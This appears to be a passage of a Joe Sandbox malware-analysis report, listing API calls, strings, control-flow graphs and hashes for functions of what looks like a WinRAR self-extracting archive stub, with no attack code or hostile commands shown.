                                                                                                                                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                                                                              • API String ID: 1134909389-2013832382
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph (graph not preserved)
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepTimeUnmapswprintf
                                                                                                                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\7zS49DD90FA$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                              • API String ID: 980719444-1218550165
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph (graph not preserved)
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                              • API String ID: 3432403771-2852464175
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB9EFD6), ref: 00007FF75FB9F046
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA3910: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA393D
                                                                                                                                                                                                              • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF75FB9F53D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileModuleMultiNameWide_snwprintf
                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                                                              • API String ID: 2679931996-2291855099
                                                                                                                                                                                                              • Opcode ID: 332788c91174e1ade9f6ad45af05d96810b3adf978199a3f29036aa6f4d6963b
                                                                                                                                                                                                              • Instruction ID: 7c6fb55d23ca3c080c2ad5574d5ab5352e170533050cddc7ed4cbaeb65d0e586
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 332788c91174e1ade9f6ad45af05d96810b3adf978199a3f29036aa6f4d6963b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D42BE22A196D2D5EB21BF30C5442FAA365FF04798FC84132DA4D47AA5EF3CEA45C360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                              • API String ID: 4119318379-2967466578
                                                                                                                                                                                                              • Opcode ID: b3c8d4a133128beca4afda0f7bbe26717fcf8b3fc56fb3d663ebdf430be721a6
                                                                                                                                                                                                              • Instruction ID: c526bac571c6a907780a1ee60d0aba1aa0fa452d443177f3761b67d531a65133
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3c8d4a133128beca4afda0f7bbe26717fcf8b3fc56fb3d663ebdf430be721a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41DD71B0079286F710AF62E814BEDA761EB41B98F890138DD690BB98CF3DE446CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7F61
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7F6F
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7F99
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7FDF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7FEB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                              • Opcode ID: 70b29b737c0f87020b2ba131dab067a72e458dfbcb83f2a1695337ea3341b381
                                                                                                                                                                                                              • Instruction ID: e0047824b92d0287c396d615bfb15a7c837cc60738b9c9ea2120f8aa1bea5496
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70b29b737c0f87020b2ba131dab067a72e458dfbcb83f2a1695337ea3341b381
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57319421A1AAC2D6FE15AB3698105F6A294BF44BA0FED0535ED1D47394DF3CE841C328
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                                                                                                                                              • String ID: ]
                                                                                                                                                                                                              • API String ID: 2347093688-3352871620
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 1125 7ff75fb9a990-7ff75fb9a9ba call 7ff75fbb3900 1128 7ff75fb9a9c7 1125->1128 1129 7ff75fb9a9bc-7ff75fb9a9c0 1125->1129 1130 7ff75fb9a9ca-7ff75fb9aa3e CreateFileW 1128->1130 1129->1128 1131 7ff75fb9a9c2-7ff75fb9a9c5 1129->1131 1132 7ff75fb9aa40-7ff75fb9aa5d GetLastError call 7ff75fb9cbcc 1130->1132 1133 7ff75fb9aa9e-7ff75fb9aaa5 1130->1133 1131->1130 1139 7ff75fb9aa5f-7ff75fb9aa9c CreateFileW GetLastError 1132->1139 1140 7ff75fb9aab2 1132->1140 1135 7ff75fb9aaaa-7ff75fb9aaae 1133->1135 1137 7ff75fb9aab0 1135->1137 1138 7ff75fb9aac5-7ff75fb9aac9 1135->1138 1141 7ff75fb9aab7-7ff75fb9aab9 1137->1141 1142 7ff75fb9aaf8-7ff75fb9ab0c 1138->1142 1143 7ff75fb9aacb-7ff75fb9aacf 1138->1143 1139->1135 1140->1141 1141->1138 1146 7ff75fb9aabb 1141->1146 1144 7ff75fb9ab28-7ff75fb9ab41 1142->1144 1145 7ff75fb9ab0e-7ff75fb9ab24 call 7ff75fba2090 1142->1145 1143->1142 1147 7ff75fb9aad1-7ff75fb9aaf2 SetFileTime 1143->1147 1145->1144 1146->1138 1147->1142
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 1150 7ff75fbbffe4-7ff75fbc003a 1151 7ff75fbc0040-7ff75fbc0043 1150->1151 1152 7ff75fbc0165 1150->1152 1154 7ff75fbc0045-7ff75fbc0048 1151->1154 1155 7ff75fbc004d-7ff75fbc0050 1151->1155 1153 7ff75fbc0167-7ff75fbc0183 1152->1153 1154->1153 1156 7ff75fbc0056-7ff75fbc0064 1155->1156 1157 7ff75fbc00f9 1155->1157 1158 7ff75fbc0066-7ff75fbc0069 1156->1158 1159 7ff75fbc006d-7ff75fbc008c LoadLibraryW 1156->1159 1160 7ff75fbc00fb-7ff75fbc00fe 1157->1160 1163 7ff75fbc00e5-7ff75fbc00ec 1158->1163 1164 7ff75fbc006b 1158->1164 1165 7ff75fbc00ae-7ff75fbc00b8 1159->1165 1166 7ff75fbc008e-7ff75fbc0097 GetLastError 1159->1166 1161 7ff75fbc0100-7ff75fbc010f GetProcAddress 1160->1161 1162 7ff75fbc014a-7ff75fbc015d 1160->1162 1167 7ff75fbc0111-7ff75fbc0138 1161->1167 1168 7ff75fbc0143 1161->1168 1162->1152 1163->1156 1174 7ff75fbc00f2 1163->1174 1169 7ff75fbc00e0-7ff75fbc00e3 1164->1169 1172 7ff75fbc00ba-7ff75fbc00c5 1165->1172 1173 7ff75fbc00c7-7ff75fbc00d5 1165->1173 1170 7ff75fbc0099-7ff75fbc00aa LoadLibraryExW 1166->1170 1171 7ff75fbc00ac 1166->1171 1167->1153 1168->1162 1169->1163 1176 7ff75fbc013a-7ff75fbc0141 1169->1176 1170->1165 1171->1165 1172->1163 1173->1169 1175 7ff75fbc00d7-7ff75fbc00da FreeLibrary 1173->1175 1174->1157 1175->1169 1176->1160
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190572456-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1266772231-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 1412 7ff75fbae8b0-7ff75fbae8cf GetClassNameW 1413 7ff75fbae8d1-7ff75fbae8e4 call 7ff75fba3d70 1412->1413 1414 7ff75fbae8fe-7ff75fbae901 1412->1414 1413->1414 1419 7ff75fbae8e6-7ff75fbae8fb FindWindowExW 1413->1419 1416 7ff75fbae911-7ff75fbae919 1414->1416 1417 7ff75fbae903-7ff75fbae90b SHAutoComplete 1414->1417 1417->1416 1419->1414
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                              • String ID: EDIT
                                                                                                                                                                                                              • API String ID: 4243998846-3080729518
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1452418845-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2244327787-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CreatePriority
                                                                                                                                                                                                              • String ID: CreateThread failed
                                                                                                                                                                                                              • API String ID: 2610526550-3849766595
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                                                              • String ID: riched20.dll
                                                                                                                                                                                                              • API String ID: 174490985-3360196438
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2584219951-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1875163511-0
                                                                                                                                                                                                              • Opcode ID: 7d6e2ed02b66bbeced6f690ef67be6673874d613937fa3cb223cf6d02c80556f
                                                                                                                                                                                                              • Instruction ID: f49a292b5e8c1772f7fecb87f0bd95f4af904bf196932f2e67f4cf400d1525cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6e2ed02b66bbeced6f690ef67be6673874d613937fa3cb223cf6d02c80556f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B81A022A0AAC2C5EB65EE35D5403F9B760EB54B84F9C4031DB8D17B99DF3CE6418324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite$Handle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4209713984-0
                                                                                                                                                                                                              • Opcode ID: a319676427f459690ec52ac86a757fbd42f7d88e4113bbaacc72b2efb73a18da
                                                                                                                                                                                                              • Instruction ID: faf5c766ebc77464e2a321758bb232aaf8a2afacfcff0651f36459f299c8d16b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a319676427f459690ec52ac86a757fbd42f7d88e4113bbaacc72b2efb73a18da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA41C726A18696D2EB10EF35E6143FAA371FB44B88F984031DB4D47A94CF3CD645C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B476
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B4AB
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B4C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectory$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2485089472-0
                                                                                                                                                                                                              • Opcode ID: c9ab371ae59f2440eef835ea9f5a6e52d4b46bdcf5dc6751ca115eb4fec73a4b
                                                                                                                                                                                                              • Instruction ID: e1b6a0c5273e43d2da4f37a3a4e2c9edf112c844e2779bebbb0a090e917f6131
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9ab371ae59f2440eef835ea9f5a6e52d4b46bdcf5dc6751ca115eb4fec73a4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D118E11A0C6C6C1E760BB319A402FEA3A1AF44BC0FDC8031E94D427D5CF2CEA459770
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                              • Opcode ID: 6ab270daf2d06d3a915f511d4526503b9d356a6867b357696674190a5d8d80e5
                                                                                                                                                                                                              • Instruction ID: e7c855078abfd7e2d1c8a7ddc04f2a3800caa6febfe185775793b38cb3f90fe6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ab270daf2d06d3a915f511d4526503b9d356a6867b357696674190a5d8d80e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E09A60F04797C3EA54BF719D856FB63525F88751F485438C84E47392CE7DE8498264
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                                                                                              • Opcode ID: 915aaa3ed93b8d4128247323173d346e5403718ae2162dad5d738a91136e2319
                                                                                                                                                                                                              • Instruction ID: 2805a7f71f199b7919a63d535651d0df8f8faaa608e5d86ec8583bb7a64dd997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 915aaa3ed93b8d4128247323173d346e5403718ae2162dad5d738a91136e2319
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66512B72A1C6C2CAE7219F38D0443EEBBA0F749748F984136D68987A55CF7DD156CB20
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String
                                                                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                                                                                                                              • Opcode ID: 671599484b35d4b4192aaa78a5ea891c74b1563b76e86694b4932b584af60a2b
                                                                                                                                                                                                              • Instruction ID: 11c5bff89d49698310d222df895e618b0dfb6bd9d776aa4b0af654ed817b0c54
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 671599484b35d4b4192aaa78a5ea891c74b1563b76e86694b4932b584af60a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C521FC35A08B8582D660DF56B8401AAB7A5F7C8B94F584136EE8D43B19DF38D451CB14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF75FBBF521), ref: 00007FF75FBC0351
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                              • API String ID: 2593887523-3084827643
                                                                                                                                                                                                              • Opcode ID: 65a1b59922d5a86b6fff1e689cf7982eb072f455a74a901bfcec2c6b1a57fc34
                                                                                                                                                                                                              • Instruction ID: ca65f4816ae0428ecc2d9485772434f5147285b52ca879ef28e2a0aa13ac6120
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65a1b59922d5a86b6fff1e689cf7982eb072f455a74a901bfcec2c6b1a57fc34
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F01929F19BC6C2EA04AF66B4404AAB761BB89BC0F9C4036EA9D07B19DE3CD445C710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc
